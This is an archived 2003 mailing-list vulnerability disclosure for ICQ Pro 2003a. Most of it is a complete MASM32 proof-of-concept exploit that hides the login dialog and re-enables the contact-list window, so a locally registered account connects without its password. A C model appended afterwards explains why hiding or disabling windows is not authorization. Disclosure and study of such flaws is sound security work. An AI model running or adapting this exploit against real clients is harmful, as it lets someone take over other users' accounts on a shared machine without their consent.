ICQ 2003a Password Bypass

From: Cauу (mourapradoat_private)
Date: Sat Jul 05 2003 - 06:30:23 PDT


    Software: ICQ 2003a
    Threat: Login password can be bypassed locally
    
    I have found a vulnerability in ICQ Pro 2003a that allows anyone to 
    connect to the ICQ server using any account registered locally, 
    regardless of whether the 'save password' option is checked or not. 
    The high-level security password is also bypassed!
    
    How does it work?
    Simple! You may use the EnableWindow API to enable the ICQ contact 
    list window. After enabling the window you can set your status to 
    online and the UIN will be connected, no matter how high your 
    security level is.
    
    I coded a proof-of-concept exploit on July 2, when I found the vuln. 
    The exploit is provided "as is" without warranties. 
    To compile it you will need MASM32.
    
    ; =========================================================================
    ;         CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
    ; -------------------------------------------------------------------------
    ;
    ;  07/02/2003 - ca1-icq.asm
    ;  ICQ Password Bypass exploit.
    ;  written by Cauу Moura Prado (aka ca1)
    ;  mourapradoat_private - ICQ 373313
    ;
    ;  This exploit allows you to login to the ICQ server using any account registered *locally*,
    ;  no matter whether the 'save password' option is checked or not. High level security is also bypassed.
    ;  All you have to do is run the exploit and set the status property using your mouse when the flower
    ;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
    ;  the exploit again. Greets to: Alex Demchenko (aka Coban), my cousin Rhenan for testing the exploit
    ;  on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
    ;  I can't forget...  many kisses to those 3 chicks from my building for being so hot!! ;)
    ;
    ;
    ;        uh-oh!
    ;         ___
    ;      __/   \__
    ;     /  \___/  \        Vulnerable:
    ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
    ;     /   ~~~   \
    ;     \__/   \__/        Not Vulnerable:
    ;        \___/             ICQ Lite alpha Build 1211
    ;                          ICQ 2001b and ICQ 2002a
    ;    tHe Flaw Power        All other versions were not tested.
    ;                                                      coded with masm32
    ;
    ; _______________________________________________________________________exploit born in .br
    
    .386
    .model flat, stdcall
    option casemap:none
    include \masm32\include\user32.inc
    include \masm32\include\kernel32.inc
    includelib \masm32\lib\user32.lib
    includelib \masm32\lib\kernel32.lib
    .data
    szTextHigh byte 'Password Verification', 0   ; caption of the high-security login dialog
    szTextLow  byte 'Login to server', 0         ; caption of the normal login dialog
    szClassName byte '#32770', 0                 ; standard Windows dialog box class
    .data?
    hWndLogin dword ?
    .code
    _entrypoint:
     invoke FindWindow, addr szClassName, addr szTextHigh
     mov hWndLogin, eax
     .if hWndLogin == 0
       invoke FindWindow, addr szClassName, addr szTextLow
       mov hWndLogin, eax
     .endif
     invoke GetParent, hWndLogin
     invoke EnableWindow, eax, 1      ; Enable ICQ contact list (parent of the modal login dialog)
     invoke ShowWindow, hWndLogin, 0  ; get rid of Login screen (don't kill this window)
     invoke ExitProcess, 0            ; uhuu.. cya! i gotta sleep!
    end _entrypoint
    
    ; =========================================================================
    ;         CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
    ; -------------------------------------------------------------------------
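    As an added illustration (not part of the original post and not ICQ's own code), the C model below shows the design flaw behind this bypass: a modal login dialog that merely disables its parent window is not an authorization check, because EnableWindow and ShowWindow can be called from any other process on the same desktop. All type and function names are hypothetical, and the window state is a constructed stand-in for the real Win32 handles.

```c
/* Added example: models "UI gating" vs. real credential verification.
 * Hypothetical names; constructed state, no Win32 calls are made. */
#include <stdbool.h>
#include <string.h>

/* Stand-in for the window state the exploit manipulates from outside. */
typedef struct {
    bool contact_list_enabled;  /* EnableWindow() can flip this from any process */
    bool login_dialog_visible;  /* ShowWindow(hwnd, SW_HIDE) can flip this too   */
    bool password_verified;     /* set only by the real credential check         */
} client_state;

/* Login dialog shown: parent window disabled, nothing verified yet. */
static client_state show_login_dialog(void) {
    client_state s = { false, true, false };
    return s;
}

/* What an external tool can do without knowing any password. */
static void external_enable_window(client_state *s) {
    s->contact_list_enabled = true;   /* EnableWindow(GetParent(hLogin), TRUE) */
    s->login_dialog_visible = false;  /* ShowWindow(hLogin, SW_HIDE)           */
}

/* The only path that should unlock a session: the credential check itself. */
static void verify_password(client_state *s, const char *supplied, const char *expected) {
    if (strcmp(supplied, expected) == 0) {
        s->password_verified = true;
        s->contact_list_enabled = true;
        s->login_dialog_visible = false;
    }
}

/* Vulnerable design: "the user could reach the status menu" is taken as proof of login. */
static bool vulnerable_go_online(const client_state *s) {
    return s->contact_list_enabled && !s->login_dialog_visible;
}

/* Hardened design: connect only on verified credentials, whatever the UI state. */
static bool hardened_go_online(const client_state *s) {
    return s->password_verified;
}

/* Scenario 1: window re-enabled from outside, no credentials supplied. */
static bool bypass_connects(bool hardened) {
    client_state s = show_login_dialog();
    external_enable_window(&s);
    return hardened ? hardened_go_online(&s) : vulnerable_go_online(&s);
}

/* Scenario 2: a user types a password into the dialog (expected value is constructed). */
static bool login_connects(bool hardened, const char *supplied) {
    client_state s = show_login_dialog();
    verify_password(&s, supplied, "correct-horse");
    return hardened ? hardened_go_online(&s) : vulnerable_go_online(&s);
}
```

The vulnerable variant connects in scenario 1 even though no password was ever checked; the hardened variant connects only when verify_password succeeded.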
    



    This archive was generated by hypermail 2b30 : Mon Jul 07 2003 - 13:51:37 PDT